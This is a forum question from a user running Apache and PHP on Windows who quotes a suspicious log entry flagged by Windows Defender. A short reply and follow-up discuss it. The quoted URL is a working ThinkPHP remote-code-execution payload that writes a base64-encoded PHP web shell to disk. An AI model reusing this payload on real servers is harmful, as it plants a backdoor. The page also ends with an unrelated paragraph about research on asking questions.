Score:0

Apache 2.4.51 URL Defence

id flag

I am running Apache 2.4.51 with PHP 8.1.0 on a Windows 10 PC. Recently, I noticed some entries in my log and corresponding alerts from Windows Defender. An example culprit causing an AV alert is https://jacobsm.com/?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs)); which gives a 200 code in response, and an alert from Windows Defender of Backdoor:PHP/Remoteshell.B. Defender also states that the Status is failed and that it may not have been fully remediated. The file affected is the Apache log file, so it can't quarantine it because it is in use by Apache. I suspect it is worried that the file may be interpreted by the PHP processor (although it never will be). Should I be concerned?

in flag
Yes, you should. Either your Windows PC is exposed directly to the internet, or you have malware roaming in your LAN. Both are issues that should be addressed.
id flag
Okay, I have removed PHP from the stack, and use alternative techniques to obtain what I was getting with PHP. I should be safe now with just Apache 2.4.51 running, surely?!?
mangohost

Post an answer

Most people don’t grasp that asking a lot of questions unlocks learning and improves interpersonal bonding. In Alison’s studies, for example, though people could accurately recall how many questions had been asked in their conversations, they didn’t intuit the link between questions and liking. Across four studies, in which participants were engaged in conversations themselves or read transcripts of others’ conversations, people tended not to realize that question asking would influence—or had influenced—the level of amity between the conversationalists.